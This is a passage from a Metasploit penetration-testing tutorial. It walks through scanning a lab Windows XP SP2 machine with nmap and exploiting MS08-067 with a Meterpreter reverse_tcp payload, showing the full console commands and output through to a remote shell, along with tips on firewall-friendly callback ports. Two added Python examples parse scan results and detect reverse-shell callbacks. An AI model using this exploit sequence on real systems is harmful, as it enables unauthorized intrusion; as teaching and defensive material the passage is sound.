With some of the basics behind us and an understanding of how to set variables within msfconsole, let’s exploit our first machine. To do so, fire up your Windows XP Service Pack 2 and Ubuntu 9.04 virtual machines. We’ll use Metasploit from within Back|Track.
If you used the vulnerability scanners discussed in Chapter 4 against your virtual Windows XP SP2 machine, you will have encountered the vulnerability we’ll exploit in this chapter: MS08-067. We’ll begin by finding this vulnerability on our own.
As your skills as a penetration tester improve, the discovery of certain open ports will trigger ideas about how you might exploit a particular service. One of the best ways to conduct this check is by using nmap’s script options within Metasploit as shown here:
root@bt:/root# cd /opt/framework3/msf3/
root@bt:/opt/framework3/msf3# msfconsole
. . . SNIP . . .
msf > nmap -sT -A --script=smb-check-vulns -P0 192.168.33.130
[*] exec: nmap -sT -A --script=smb-check-vulns -P0 192.168.33.130

Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:46 EDT
Warning: Traceroute does not support idle or connect scan, disabling...
NSE: Script Scanning completed.
Nmap scan report for 192.168.33.130
Host is up (0.00050s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
25/tcp   open  smtp         Microsoft ESMTP 6.0.2600.2180
80/tcp   open  http         Microsoft IIS webserver 5.1
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  https?
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  msrpc        Microsoft Windows RPC
1433/tcp open  ms-sql-s     Microsoft SQL Server 2005 9.00.1399; RTM
MAC Address: 00:0C:29:EA:26:7C (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: Host: ihazsecurity; OS: Windows

Host script results:
  smb-check-vulns:
    MS08-067: VULNERABLE
    Conficker: Likely CLEAN
    regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
    SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.67 seconds
msf >
Here, we call nmap from within Metasploit with the --script=smb-check-vulns plug-in. Notice the flags used while scanning the host with nmap. The -sT is a Stealth TCP connect, which we have found to be the most reliable flag when trying to enumerate ports. (Others prefer -sS, or Stealth Syn.) The -A specifies advanced OS detection, which does some additional banner grabs and footprinting of a specific service for us.
Notice in the results from nmap that MS08-067: VULNERABLE is reported under the host script results. This is a good indicator that we have a chance at exploiting this system. Let’s use Metasploit to find the exploit we want and attempt to compromise the system.
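As an added example (not part of the book), here is how a defender who runs the same smb-check-vulns scan across their own hosts might parse the report and turn it into a patch list rather than reading it by eye. The sample scan text is constructed in nmap's own layout, and the function and variable names are my own.

```python
import re
# Constructed sample in the layout "nmap -A --script=smb-check-vulns" prints; nmap prefixes
# script output with "|" / "|_" (the listing above has them stripped). Not real scan data.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.33.130
| smb-check-vulns:
|   MS08-067: VULNERABLE
|_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
Nmap scan report for 192.168.33.131
| smb-check-vulns:
|_  MS08-067: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
CHECK_RE = re.compile(r"^(.+?):\s+(.+)$")          # "name: status", split at the first colon

def parse_smb_check_vulns(scan_text):
    """Return {host: {check_name: status_text}} from each host's smb-check-vulns block."""
    results, host, in_section = {}, None, False
    for raw in scan_text.splitlines():
        m = HOST_RE.match(raw)
        if m:
            host, in_section = m.group(1), False
            continue
        line = raw.lstrip("|_ \t")                 # drop nmap's pipe prefix and indentation
        if host and line.startswith("smb-check-vulns:"):
            in_section = True
        elif in_section:
            m = CHECK_RE.match(line) if raw[:1] in ("|", " ", "\t") else None
            if m:
                results.setdefault(host, {})[m.group(1).strip()] = m.group(2).strip()
            else:
                in_section = False                 # blank or unindented line ends the block
    return results

VERDICTS = (("NOT VULNERABLE", "clean"), ("LIKELY CLEAN", "clean"),   # order matters:
            ("VULNERABLE", "vulnerable"), ("CHECK DISABLED", "unchecked"))  # NOT ... first

def classify(status):
    """Bucket nmap's free-text verdict into a triage category."""
    s = status.upper()
    return next((bucket for prefix, bucket in VERDICTS if s.startswith(prefix)), "unknown")

def triage(scan_text, check="MS08-067"):
    """'vulnerable' hosts need the patch now; 'unchecked' means nmap skipped the test."""
    buckets = {"vulnerable": [], "unchecked": [], "clean": [], "unknown": []}
    for host, checks in sorted(parse_smb_check_vulns(scan_text).items()):
        buckets[classify(checks.get(check, ""))].append(host)
    return buckets
```

A check reported as CHECK DISABLED is unverified, not clean, so it should stay on the follow-up list rather than being closed out.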
This exploit is specific to the operating system version, service pack, and language in use on the system, a result of the exploit bypassing Data Execution Prevention (DEP). DEP was created to help protect against buffer overflow attacks by rendering the stack read-only and thereby preventing arbitrarily placed shellcode from executing. However, we can bypass DEP and force Windows to make the stack writable by performing some complex stack manipulation. (For more on bypassing DEP, see http://www.uninformed.org/?v=2&a=4.)
In the listing that follows, we use the show targets command, which lists each vulnerable version for this specific attack vector. Because MS08-067 is an exploit that is very specific regarding the OS version in use, we will manually set our target to make sure we trigger the correct overflow. Based on the nmap scan results shown in the preceding example, we can tell that the system is running Windows XP Service Pack 2. (It is also identified as possibly Windows 2003, but the system is missing key ports that would be associated with the Server Edition.) We’ll assume that our target is running the English version of XP.
Let’s walk through the actual exploitation. First the setup:
msf > search ms08_067_netapi
[*] Searching loaded modules for pattern 'ms08_067_netapi'...

Exploits
========

   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path Stack Corruption

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   5   Windows 2003 SP0 Universal
   6   Windows 2003 SP1 English (NO NX)
   7   Windows 2003 SP1 English (NX)
   8   Windows 2003 SP2 English (NO NX)
   9   Windows 2003 SP2 English (NX)
   . . . SNIP . . .
   26  Windows XP SP2 Japanese (NX)
   . . . SNIP . . .

msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.33.130   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.33.129   yes       The local address
   LPORT     8080             yes       The local port

Exploit target:

   Id  Name
   --  ----
   3   Windows XP SP2 English (NX)
We search for the MS08-067 NetAPI exploit in the Framework. Then, having found our exploit, we load the windows/smb/ms08_067_netapi exploit. Next, we set the payload as the Windows-based Meterpreter reverse_tcp, which, if successful, will start a connection on the target machine and connect back to the attacking machine specified with LHOST. This is important if you find that a firewall is in place and you need to bypass incoming controls on a firewall or NAT.
Meterpreter is a post-exploitation tool that we’ll use throughout this book. One of Metasploit’s flagship tools, it makes extracting information or further compromising systems significantly easier.
The show targets command allows us to identify the system we want to target. (Although many MSF exploits use automatic targeting and don’t require this flag, autodetection generally fails in MS08-067.) We then set our target to Windows XP SP2 English (NX). The NX stands for No Execute. By default in Windows XP SP2, DEP is enabled.
Next, we set RHOST to the IP address of our target machine, the host that is vulnerable to the MS08-067 exploit.
The set LHOST command specifies our attacking machine’s IP address (the Back|Track machine), and the LPORT option specifies the port on which our attacker machine will listen for a connection from our target. (When you’re setting the LPORT option, use a standard port that you think will be allowed through the firewall: Ports 443, 80, 53, and 8080 are often good options.) Finally, we enter show options to make sure that the options are set up correctly.
Having set the stage, we’re ready to conduct the actual exploitation:
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Type         Information  Connection
  --  ----         -----------  ----------
  1   meterpreter               192.168.33.129:8080 -> 192.168.33.130:1036

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 4060 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
The exploit command initiates our exploit and attempts to attack the target. The attack succeeds and gives us a reverse_tcp Meterpreter payload, which we can view with sessions -l. Only one session is active, but if we targeted multiple systems, several sessions could be open simultaneously. (To view a list of the exploits that created each session, you would enter sessions -l -v.)
The sessions -i 1 command is issued to “interact” with an individual session. Notice that this drops us into a Meterpreter shell. If, for example, a reverse command shell existed, this command would drop us straight to a command prompt. And, finally, we enter shell to jump into an interactive command shell on the target.
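An added example, not from the book: detection logic a defender might run over connection logs to catch the server-to-client call-back that the reverse_tcp payload above relies on, whichever of the firewall-friendly ports is chosen for LPORT. The flow-log format, the 60-second window and the function names are my assumptions; the records are constructed to mirror the addresses and ports in the session listing.

```python
from datetime import datetime, timedelta

# Constructed flow records (timestamp proto src sport dst dport), one per TCP connection.
# The first two mirror the session above: an inbound SMB connection to the XP host on 445,
# then that host connecting back out to the same peer on 8080. Not real network data.
FLOWS = """\
2011-03-15T19:50:01 tcp 192.168.33.129 54211 192.168.33.130 445
2011-03-15T19:50:02 tcp 192.168.33.130 1487 192.168.33.129 8080
2011-03-15T19:55:10 tcp 192.168.33.140 52000 192.168.33.130 445
2011-03-15T20:10:00 tcp 192.168.33.130 1500 192.168.33.140 80
"""

SMB_PORT = 445

def parse_flows(text):
    """Parse the constructed format into (time, proto, src, sport, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if line.strip():
            ts, proto, src, sport, dst, dport = line.split()
            flows.append((datetime.fromisoformat(ts), proto, src, int(sport), dst, int(dport)))
    return flows

def smb_callbacks(text, window_s=60):
    """Flag every inbound SMB connection that is followed, within window_s seconds, by the
    SMB server opening a connection back to the same client. That server-to-client
    turn-around is the shape of a reverse_tcp payload whatever port it uses, so choosing
    443/80/53/8080 to blend with firewall policy does not hide it. The second pair in FLOWS
    is 15 minutes apart and is only reported if the window is widened."""
    flows = parse_flows(text)
    window = timedelta(seconds=window_s)
    alerts = []
    for t_in, proto, client, _, server, dport in flows:
        if proto != "tcp" or dport != SMB_PORT:
            continue
        for t_out, p2, src, _, dst, cb_port in flows:
            if p2 == "tcp" and src == server and dst == client and t_in < t_out <= t_in + window:
                alerts.append({"server": server, "peer": client, "callback_port": cb_port,
                               "delay_s": int((t_out - t_in).total_seconds())})
    return alerts
```

On a real network the same pairing can be applied to firewall or NetFlow exports; file servers that legitimately open connections back to clients should be listed as exceptions rather than by widening the window.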
Congratulations! You’ve just compromised your first machine! To list the available options for a particular exploit, you can enter show options.